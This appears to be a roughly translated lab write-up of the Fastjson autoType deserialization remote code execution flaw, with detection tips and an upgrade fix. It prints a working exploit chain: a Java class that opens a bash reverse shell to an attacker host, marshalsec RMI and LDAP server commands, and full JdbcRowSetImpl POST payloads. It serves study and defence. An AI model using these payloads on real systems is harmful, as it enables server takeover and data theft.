1. Vulnerability introduction

​​FastJson parsing json In the process of supporting the use of autoType To instantiate a specific class and call the class's set/get method to access properties. By looking for related methods in the code, some malicious exploit chains can be constructed.

Popular understanding is: exploit fastjson autotype processing json object, not right@type field for complete security verification, the attacker can pass in the dangerous class, and call the dangerous class to connect to the remote rmi Host, through which malicious classes execute code.

In this way, attackers can exploit remote code execution vulnerabilities, obtain sensitive server information disclosure, and even use this vulnerability to further modify, add, and delete server data, causing a huge impact on the server.

2. Vulnerability recurrence

(1) First use docker to create a fastjson deserialization vulnerability environment:

(2) Access the environment page as follows:

(3) RMI utilization method, first write the attack script, and bounce the shell to kali:

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.0.105/8888 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

(4) Then use javac to compile it, command:

javac Exploit.java

(5) Then there is one more .class file:

(6) Put the compiled file on kali, and start a simple HTTP service on kali, using python3, command:

python3 -m http.server 8080

(7) Then use the marshalsec project to start the RMI service, listen to port 8001 and load the remote class Exploit.class, command:

https://github.com/RandomRobbieBF/marshalsec-jar

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.105:8080/#Exploit" 8001

(8) Then open the listening port 8888 on kali

(9) Start the attack, the payload is as follows, note that it is submitted by POST:

POST / HTTP/1.1
Host: 192.168.0.105:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

{
    "naraku":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.0.105:8001/Exploit",
        "autoCommit":true
    }
}

(10) success, rebound shell

(11) LDAP utilization method

The previous process is roughly the same, the only change is to use the marshalsec project, start the LDAP service, listen to port 8002 and load the remote class Exploit.class, command:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.0.105:8080/#Exploit" 8002

(12) Still listening to port 8888 on the kali side, and launching the payload on the burp side, the payload is as follows, still pay attention to the POST request:

POST / HTTP/1.1
Host: 192.168.0.105:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

{
    "naraku":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.0.105:8002/Exploit",
        "autoCommit":true
    }
}

(13) success, rebound shell

3. Vulnerability detection

(1) When capturing the packet, I just saw that it sent json data

(2) Determine whether it is fastjson, use an illegal format, may report an error, read the error message, deserialize this class, and see if the platform can receive the data)

(3) Search the fastjson plug-in in GitHub, as long as the traffic passes through bp, it can be automatically detected
Method 1: Use java.net.Inet [4 | 6] address

{"@type":"java.net.Inet4Address","val":"in0i3v.ceye.io"} 
{"@type":"java.net.Inet6Address","val":"in0i3v.ceye.io"}

Method 2: Using java.net.InetSocketAddress

{"@type":"java.net.InetSocketAddress"{"address":,"val":"in0i3v.ceye.io"}}

Method 3: Using java.net.URL

{{"@type":"java.net.URL","val":"http://in0i3v.ceye.io"}:"x"}

4. The cause of the vulnerability

The data after deserialization is harmless, but it is harmful for users to use controllable data

Vulnerability information:

Fastjson 1.2.24 deserialization leads to arbitrary command execution vulnerability: in the process of parsing json, fastjson supports using autoType to instantiate a specific class, and calls the set/get method of this class to access properties. By looking for related methods in the code, some malicious exploit chains can be constructed. Affects versions fastjson <= 1.2.24.

Fastjson 1.2.47 remote command execution vulnerability: fastjson added a deserialization whitelist after version 1.2.24, but in versions before 1.2.48, attackers can use specially constructed json strings to bypass whitelist detection, Successful execution of arbitrary commands. Affects versions fastjson <1.2.48.

5. Bug fixes

1. The version of fastjson must be upgraded to at least 1.2.58.

2. Upgrade the Java environment version in time

‍